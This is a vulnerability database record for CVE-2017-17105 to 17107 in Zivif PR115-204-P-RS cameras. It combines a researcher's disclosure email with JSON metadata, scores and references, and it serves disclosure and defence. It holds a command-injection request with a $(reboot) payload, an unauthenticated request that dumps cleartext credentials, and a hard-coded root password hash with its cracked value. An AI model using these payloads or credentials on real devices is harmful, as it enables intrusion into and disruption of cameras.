var-201712-0828
Vulnerability from variot
Zivif PR115-204-P-RS V2.3.4.2103 and V4.7.4.2121 (and possibly in-between versions) web cameras are vulnerable to unauthenticated, blind remote command injection via CGI scripts used as part of the web interface, as demonstrated by a cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot) request. Zivif Web The camera contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The ZivifPR115-204-P-RS is a network camera device. A remote command injection vulnerability exists in the ZivifPR115-204-P-RS2.3.4.2103 release. A remote attacker can exploit this vulnerability to inject arbitrary commands. This vulnerability stems from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data. Attack vector: Remote
Authentication: None
Researcher: Silas Cutler p1nk silas.cutler@blacklistthisdomain.com
Release date: December 10, 2017
Full Disclosure: 90 days
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107
Vulnerable Device: Zivif PR115-204-P-RS
Version: V2.3.4.2103
Timeline: 1 September 2017: Initial alerting to Zivif 1 September 2017: Zivif contact established. 3 September 2017: Details provided. 7 September 2017: Confirmation of vulnerabilities from Zivif 5 December 2017: Public note on Social Media CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic. 10 December 2017: This email
-[Overview]- Implementation of access controls is Zivif cameras is severely lacking. As a result, CGI functions can be called directly, bypassing authentication checks.
This was first identified with the following request (CVE-2017-17106) http:///web/cgi-bin/hi3510/param.cgi?cmd=getuser Cameras respond to this with:
var name0="admin"; var password0="admin"; var authLevel0="255"; var name1="guest"; var password1="guest"; var authLevel1="3"; var name2="admin2"; var password2="admin"; var authLevel2="3"; var name3=""; var password3=""; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0 Credentials are returned in cleartext to the requester.
One last findings was the /etc/passwd file contains the following hard-coded entry (CVE-2017-17107): root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh
The encrypted password is cat1029.
(none) login: root Password: Login incorrect (none) login: root Password: Welcome to SONIX. \u@\h:\W$ Because of the way the file system is structured, changing this password requires more work then running passwd.
-[Note]- The hi3510 is shared with a couple other cameras I'm exploring. The motd saying /Welcome to SONIX/ has lead me to speculate parts of this firmware may be shared with other cameras.
-Silas
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201712-0828",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "pr115-204-p-rs",
"scope": "eq",
"trust": 3.0,
"vendor": "zivif",
"version": "2.3.4.2103"
},
{
"model": "pr115-204-p-rs",
"scope": "eq",
"trust": 1.0,
"vendor": "zivif",
"version": "4.7.4.2121"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-147"
},
{
"db": "NVD",
"id": "CVE-2017-17105"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:zivif:pr115-204-p-rs_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Silas Cutler",
"sources": [
{
"db": "PACKETSTORM",
"id": "145386"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-147"
}
],
"trust": 0.7
},
"cve": "CVE-2017-17105",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2017-17105",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-01360",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-108094",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2017-17105",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-17105",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2017-17105",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-01360",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201712-147",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-108094",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-17105",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"db": "VULHUB",
"id": "VHN-108094"
},
{
"db": "VULMON",
"id": "CVE-2017-17105"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-147"
},
{
"db": "NVD",
"id": "CVE-2017-17105"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Zivif PR115-204-P-RS V2.3.4.2103 and V4.7.4.2121 (and possibly in-between versions) web cameras are vulnerable to unauthenticated, blind remote command injection via CGI scripts used as part of the web interface, as demonstrated by a cgi-bin/iptest.cgi?cmd=iptest.cgi\u0026-time=\"1504225666237\"\u0026-url=$(reboot) request. Zivif Web The camera contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The ZivifPR115-204-P-RS is a network camera device. A remote command injection vulnerability exists in the ZivifPR115-204-P-RS2.3.4.2103 release. A remote attacker can exploit this vulnerability to inject arbitrary commands. This vulnerability stems from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data. Attack vector: Remote\nAuthentication: None\nResearcher: Silas Cutler `p1nk` \u003csilas.cutler@blacklistthisdomain.com\u003e\nRelease date: December 10, 2017\nFull Disclosure: 90 days\nCVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107\nVulnerable Device: Zivif PR115-204-P-RS\nVersion: V2.3.4.2103\n\n\nTimeline:\n1 September 2017: Initial alerting to Zivif\n1 September 2017: Zivif contact established. \n3 September 2017: Details provided. \n7 September 2017: Confirmation of vulnerabilities from Zivif\n5 December 2017: Public note on Social Media CVE-2017-17105,\nCVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic. \n10 December 2017: This email\n\n\n-[Overview]-\nImplementation of access controls is Zivif cameras is severely lacking. \nAs a result, CGI functions can be called directly, bypassing\nauthentication checks. \n\nThis was first identified with the following request (CVE-2017-17106)\nhttp://\u003cCamera Address\u003e/web/cgi-bin/hi3510/param.cgi?cmd=getuser\nCameras respond to this with:\n\nvar name0=\"admin\"; var password0=\"admin\"; var authLevel0=\"255\"; var\nname1=\"guest\"; var password1=\"guest\"; var authLevel1=\"3\"; var\nname2=\"admin2\"; var password2=\"admin\"; var authLevel2=\"3\"; var name3=\"\";\nvar password3=\"\"; var authLevel3=\"3\"; var name4=\"\"; var password4=\"\";\nvar authLevel4=\"3\"; var name5=\"\"; var password5=\"\"; var authLevel5=\"3\";\nvar name6=\"\"; var password6=\"\"; var authLevel6=\"3\"; var name7=\"\"; var\npassword7=\"\"; var authLevel7=\"3\"; var name8=\"\"; var password8=\"\"; var\nauthLevel8=\"0\"; var name9=\"\"; var password9=\"\"; var authLevel9=\"0\nCredentials are returned in cleartext to the requester. \n\nOne last findings was the /etc/passwd file contains the following\nhard-coded entry (CVE-2017-17107):\nroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh\n\nThe encrypted password is cat1029. \n\n(none) login: root\nPassword:\nLogin incorrect\n(none) login: root\nPassword:\nWelcome to SONIX. \n\\u@\\h:\\W$\nBecause of the way the file system is structured, changing this password\nrequires more work then running passwd. \n\n-[Note]-\nThe hi3510 is shared with a couple other cameras I\u0027m exploring. The\nmotd saying /Welcome to SONIX/ has lead me to speculate parts of this\nfirmware may be shared with other cameras. \n\n\n\n-Silas\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-17105"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"db": "VULHUB",
"id": "VHN-108094"
},
{
"db": "VULMON",
"id": "CVE-2017-17105"
},
{
"db": "PACKETSTORM",
"id": "145386"
}
],
"trust": 2.43
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-108094",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-108094"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-17105",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "145386",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "158120",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011810",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201712-147",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-01360",
"trust": 0.6
},
{
"db": "CXSECURITY",
"id": "WLB-2020060066",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-108094",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-17105",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"db": "VULHUB",
"id": "VHN-108094"
},
{
"db": "VULMON",
"id": "CVE-2017-17105"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"db": "PACKETSTORM",
"id": "145386"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-147"
},
{
"db": "NVD",
"id": "CVE-2017-17105"
}
]
},
"id": "VAR-201712-0828",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"db": "VULHUB",
"id": "VHN-108094"
}
],
"trust": 1.325
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01360"
}
]
},
"last_update_date": "2024-11-23T21:53:31.641000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://zivif.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-77",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-108094"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"db": "NVD",
"id": "CVE-2017-17105"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.8,
"url": "http://packetstormsecurity.com/files/145386/zivif-pr115-204-p-rs-2.3.4.2103-bypass-command-injection-hardcoded-password.html"
},
{
"trust": 2.6,
"url": "https://twitter.com/silascutler/status/938052460328968192"
},
{
"trust": 1.9,
"url": "http://packetstormsecurity.com/files/158120/zivif-camera-2.3.4.2103-iptest.cgi-blind-remote-command-execution.html"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2017/dec/42"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-17105"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-17105"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2020060066"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://\u003ccamera"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-17107"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-17106"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"db": "VULHUB",
"id": "VHN-108094"
},
{
"db": "VULMON",
"id": "CVE-2017-17105"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"db": "PACKETSTORM",
"id": "145386"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-147"
},
{
"db": "NVD",
"id": "CVE-2017-17105"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"db": "VULHUB",
"id": "VHN-108094"
},
{
"db": "VULMON",
"id": "CVE-2017-17105"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"db": "PACKETSTORM",
"id": "145386"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-147"
},
{
"db": "NVD",
"id": "CVE-2017-17105"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"date": "2017-12-19T00:00:00",
"db": "VULHUB",
"id": "VHN-108094"
},
{
"date": "2017-12-19T00:00:00",
"db": "VULMON",
"id": "CVE-2017-17105"
},
{
"date": "2018-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"date": "2017-12-13T16:50:24",
"db": "PACKETSTORM",
"id": "145386"
},
{
"date": "2017-12-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201712-147"
},
{
"date": "2017-12-19T02:29:41.550000",
"db": "NVD",
"id": "CVE-2017-17105"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-01360"
},
{
"date": "2020-06-16T00:00:00",
"db": "VULHUB",
"id": "VHN-108094"
},
{
"date": "2020-06-16T00:00:00",
"db": "VULMON",
"id": "CVE-2017-17105"
},
{
"date": "2018-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011810"
},
{
"date": "2020-06-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201712-147"
},
{
"date": "2024-11-21T03:17:29.930000",
"db": "NVD",
"id": "CVE-2017-17105"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201712-147"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Zivif Web Command injection vulnerability in camera",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011810"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201712-147"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…